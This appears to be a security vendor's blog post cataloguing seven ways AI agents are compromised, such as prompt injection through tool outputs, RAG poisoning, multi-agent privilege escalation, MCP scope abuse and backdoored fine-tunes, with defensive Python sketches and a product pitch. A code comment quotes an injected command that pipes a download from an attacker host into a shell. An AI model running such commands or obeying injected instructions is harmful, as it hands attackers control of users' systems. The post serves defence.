Research

The 7 Ways Agents Get Compromised

Code execution, browser sessions, RAG poisoning, delegation chains, MCP scope, supply chain, and cross-channel injection: mapped to real attack examples across the modern agentic threat surface.

8 min read
March 2026

As AI agents move from demos into production pipelines, the threat surface has expanded dramatically. Unlike a chatbot that merely returns text, a modern agent can write files, execute code, browse the web, call external APIs, and delegate subtasks to other models, all in a single request. This post maps the seven most common attack vectors we observe across customer deployments, with concrete examples of each.

What Is Code Execution Escape?

Agents with access to a code interpreter or shell can be manipulated into running attacker-supplied commands. This usually happens through a crafted user prompt or a malicious tool output that embeds shell metacharacters. Sandboxing helps, but poorly scoped sandboxes still allow network egress, filesystem writes, or subprocess spawning that exposes the host.
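To make the mitigation side concrete, here is a minimal Python sketch, assuming a hypothetical agent runtime; the names ALLOWED_BINARIES and run_tool_command are illustrative, not from any particular framework. The key property is that executing an argv list with shell=False leaves metacharacters inert, while shell=True would hand them to a shell parser.

```python
import shlex
import subprocess

# Hypothetical allowlist: only binaries the agent legitimately needs.
ALLOWED_BINARIES = {"grep", "wc", "sort"}

def run_tool_command(command: str) -> str:
    """Execute an agent-requested command without invoking a shell."""
    argv = shlex.split(command)
    if not argv or argv[0] not in ALLOWED_BINARIES:
        raise PermissionError(f"binary not allowlisted: {argv[:1]}")
    # shell=False: argv is passed directly to the OS, so smuggled `;`,
    # `|`, and backticks arrive as literal argument bytes, not control
    # operators. With shell=True, "grep x; curl attacker.example | sh"
    # would spawn the attacker's process.
    result = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return result.stdout
```

An allowlist plus argv-style execution is no substitute for a real sandbox, but it removes the cheapest injection path: a tool output that appends a second command to an otherwise benign one.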

What Are Browser Scope Leakage, RAG Poisoning, and Multi-Agent Escalation?

Browser-use agents often capture screenshots of the full desktop rather than a single tab, inadvertently exposing credential managers, open documents, and other sensitive windows that were never meant to be in scope. RAG poisoning is subtler: a single attacker-controlled document injected into a vector store can alter the instructions retrieved for every future query that touches it. Multi-agent delegation chains compound the risk: a compromised sub-agent can escalate privileges by misrepresenting its scope to an orchestrator that trusts its output without re-validating permissions.
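As a sketch of one defense against the RAG case, the snippet below tags every chunk with provenance at ingestion time and filters on it at retrieval. The toy store, the keyword scorer standing in for vector similarity, and names like Chunk and TRUSTED_SOURCES are all illustrative assumptions, not a real vector database API.

```python
from dataclasses import dataclass

@dataclass
class Chunk:
    text: str
    source: str    # ingestion channel the document arrived through
    trusted: bool  # assigned at ingestion time, never by the document itself

# Hypothetical set of channels whose documents we accept as instructions.
TRUSTED_SOURCES = {"internal-wiki", "signed-upload"}

def ingest(text: str, source: str) -> Chunk:
    # Trust derives from the channel, so a poisoned document cannot
    # claim trusted status for itself, however its text is phrased.
    return Chunk(text=text, source=source, trusted=source in TRUSTED_SOURCES)

def retrieve(chunks: list[Chunk], query: str, k: int = 3) -> list[Chunk]:
    # Naive keyword-overlap scoring stands in for vector similarity here.
    def score(c: Chunk) -> int:
        return sum(1 for w in query.lower().split() if w in c.text.lower())
    ranked = sorted(chunks, key=score, reverse=True)
    # Untrusted chunks are dropped before they can reach the prompt,
    # no matter how well they match the query.
    return [c for c in ranked if c.trusted][:k]
```

The essential design choice is that provenance is recorded out-of-band: a chunk's trust level is a property of where it came from, not of what it says.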

What Are MCP Scope Violations, Supply Chain Backdoors, and Cross-Channel Injection?

The Model Context Protocol leaves authentication largely to implementers and defines no per-tool permission boundary, so a tool registered with broad scope can be invoked in contexts the developer never intended. Model supply chain backdoors are particularly dangerous: a compromised fine-tune or adapter layer can introduce a persistent trigger that activates silently under specific input patterns. Cross-channel injection spans the widest surface area: instructions can arrive through emails the agent reads, web pages it browses, or calendar events it parses, none of which pass through your prompt-filtering layer.
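Because the protocol will not enforce this for you, a permission boundary has to live in a gateway layer sitting in front of tool dispatch. The sketch below shows a deny-by-default policy check; ToolPolicy, ToolGateway, and the context strings are hypothetical illustrations, not part of the MCP specification.

```python
from dataclasses import dataclass, field

@dataclass
class ToolPolicy:
    name: str
    allowed_contexts: set[str]  # tasks in which this tool may be invoked

@dataclass
class ToolGateway:
    """Policy layer in front of tool dispatch. MCP itself does not
    enforce per-tool boundaries, so the check must live outside it."""
    policies: dict[str, ToolPolicy] = field(default_factory=dict)

    def register(self, policy: ToolPolicy) -> None:
        self.policies[policy.name] = policy

    def authorize(self, tool_name: str, context: str) -> None:
        # Deny by default: unknown tools and out-of-scope contexts both fail.
        policy = self.policies.get(tool_name)
        if policy is None or context not in policy.allowed_contexts:
            raise PermissionError(
                f"tool {tool_name!r} not authorized in context {context!r}")

# Usage: a tool registered for email triage cannot be invoked while the
# agent is browsing the web, even if the model asks for it.
gateway = ToolGateway()
gateway.register(ToolPolicy("send_email", {"email-triage"}))
gateway.authorize("send_email", "email-triage")    # passes
# gateway.authorize("send_email", "web-browsing")  # raises PermissionError
```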


How QuilrAI addresses this: The Guardian Agent enforces per-tool permission boundaries at the MCP layer, intercepts all tool call outputs before they reach the model, and maintains a provenance index on every document in the RAG store, blocking poisoned chunks before retrieval.


Secure your AI stack today

See how QuilrAI's Guardian Agent and LLM Gateway protect your AI deployment from the threats covered in this article.

Get a Demo